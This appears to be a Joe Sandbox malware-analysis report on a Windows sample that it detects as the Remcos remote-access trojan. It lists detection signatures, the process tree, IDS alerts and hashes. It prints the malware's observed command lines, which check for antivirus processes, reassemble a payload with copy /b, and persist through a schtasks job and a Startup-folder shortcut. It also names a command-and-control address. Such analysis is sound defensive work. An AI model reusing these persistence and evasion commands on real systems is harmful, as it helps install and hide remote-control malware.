Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RailProvides_nopump.exe

Overview

General Information

Sample name:RailProvides_nopump.exe
Analysis ID:1585212
MD5:5bf20e8953b3219cd4f60be10a73509f
SHA1:c422dc032eb0a63620ddbddaac7b2d7909027a8f
SHA256:b59cbb4dbe800b77d1dcac6e13fe722816eae5665d87d05b7c5a206430320f6b
Tags:exemyguyapp-comuser-JAMESWT_MHT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
AI detected suspicious sample
Drops PE files with a suspicious file extension
Installs a global keyboard hook
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • RailProvides_nopump.exe (PID: 1868 cmdline: "C:\Users\user\Desktop\RailProvides_nopump.exe" MD5: 5BF20E8953B3219CD4F60BE10A73509F)
    • cmd.exe (PID: 5508 cmdline: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 1732 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 4796 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 6568 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2380 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 4308 cmdline: cmd /c md 361684 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 3792 cmdline: extrac32 /Y /E Approaches MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 1100 cmdline: findstr /V "Korea" Measurement MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6508 cmdline: cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 1200 cmdline: cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Propose.com (PID: 1848 cmdline: Propose.com U MD5: 62D09F076E6E0240548C2F837536A46A)
        • cmd.exe (PID: 1868 cmdline: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 6484 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 3712 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 6632 cmdline: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
  • wscript.exe (PID: 2684 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • LinkHub.com (PID: 1632 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 6496 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • LinkHub.com (PID: 4796 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    System Summary

    barindex
    Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 6496, StartAddress: CB23BCC0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 6496
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RailProvides_nopump.exe", ParentImage: C:\Users\user\Desktop\RailProvides_nopump.exe, ParentProcessId: 1868, ParentProcessName: RailProvides_nopump.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 6632, ProcessName: schtasks.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 2684, ProcessName: wscript.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RailProvides_nopump.exe", ParentImage: C:\Users\user\Desktop\RailProvides_nopump.exe, ParentProcessId: 1868, ParentProcessName: RailProvides_nopump.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 6632, ProcessName: schtasks.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 2684, ProcessName: wscript.exe

    Data Obfuscation

    barindex
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 6484, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5508, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 2380, ProcessName: findstr.exe

    Stealing of Sensitive Information

    barindex
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com, ProcessId: 1848, TargetFilename: C:\ProgramData\remcos\logs.dat
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-07T10:15:37.464130+010020365941Malware Command and Control Activity Detected192.168.2.564689193.26.115.397009TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-07T10:15:39.663394+010028033043Unknown Traffic192.168.2.564705178.237.33.5080TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: RailProvides_nopump.exeVirustotal: Detection: 9%Perma Link
    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.2% probability
    Source: RailProvides_nopump.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: RailProvides_nopump.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_002BA087
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_002BA1E2
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,21_2_002AE472
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,21_2_002BA570
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_0027C622 FindFirstFileExW,21_2_0027C622
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002B66DC FindFirstFileW,FindNextFileW,FindClose,21_2_002B66DC
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002B7333 FindFirstFileW,FindClose,21_2_002B7333
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,21_2_002B73D4
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_002AD921
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_002ADC54
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:64689 -> 193.26.115.39:7009
    Source: global trafficTCP traffic: 192.168.2.5:64689 -> 193.26.115.39:7009
    Source: global trafficTCP traffic: 192.168.2.5:64587 -> 1.1.1.1:53
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:64705 -> 178.237.33.50:80
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002BD889 InternetReadFile,SetEvent,GetLastError,SetEvent,21_2_002BD889
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: ecIUYmCipwWZXGGOIZYONyVhLKgCF.ecIUYmCipwWZXGGOIZYONyVhLKgCF
    Source: global trafficDNS traffic detected: DNS query: me-work.com
    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
    Source: RailProvides_nopump.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
    Source: RailProvides_nopump.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
    Source: RailProvides_nopump.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
    Source: RailProvides_nopump.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: RailProvides_nopump.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
    Source: RailProvides_nopump.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
    Source: RailProvides_nopump.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
    Source: RailProvides_nopump.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
    Source: RailProvides_nopump.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
    Source: RailProvides_nopump.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: RailProvides_nopump.exeString found in binary or memory: http://ocsp.digicert.com0
    Source: RailProvides_nopump.exeString found in binary or memory: http://ocsp.digicert.com0A
    Source: RailProvides_nopump.exeString found in binary or memory: http://ocsp.digicert.com0C
    Source: RailProvides_nopump.exeString found in binary or memory: http://ocsp.digicert.com0X
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000000.2074387011.0000000000F15000.00000002.00000001.01000000.00000006.sdmp, LinkHub.com, 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmp, LinkHub.com, 00000018.00000000.2213628665.0000000000315000.00000002.00000001.01000000.00000008.sdmp, LinkHub.com.13.dr, Clinton.9.dr, Propose.com.2.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
    Source: RailProvides_nopump.exeString found in binary or memory: http://www.digicert.com/CPS0
    Source: Propose.com, 0000000D.00000003.2081267154.00000000042D4000.00000004.00000800.00020000.00000000.sdmp, Propose.com, 0000000D.00000003.2390062403.00000000022D4000.00000004.00000020.00020000.00000000.sdmp, LinkHub.com.13.dr, Protocol.9.dr, Propose.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: Propose.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comJump to behavior
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002BF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,21_2_002BF7C7
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002BF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,21_2_002BF55C
    Source: C:\Users\user\Desktop\RailProvides_nopump.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002D9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,21_2_002D9FD2

    E-Banking Fraud

    barindex
    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comProcess Stats: CPU usage > 49%
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 21_2_002B4763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,21_2_002B4763
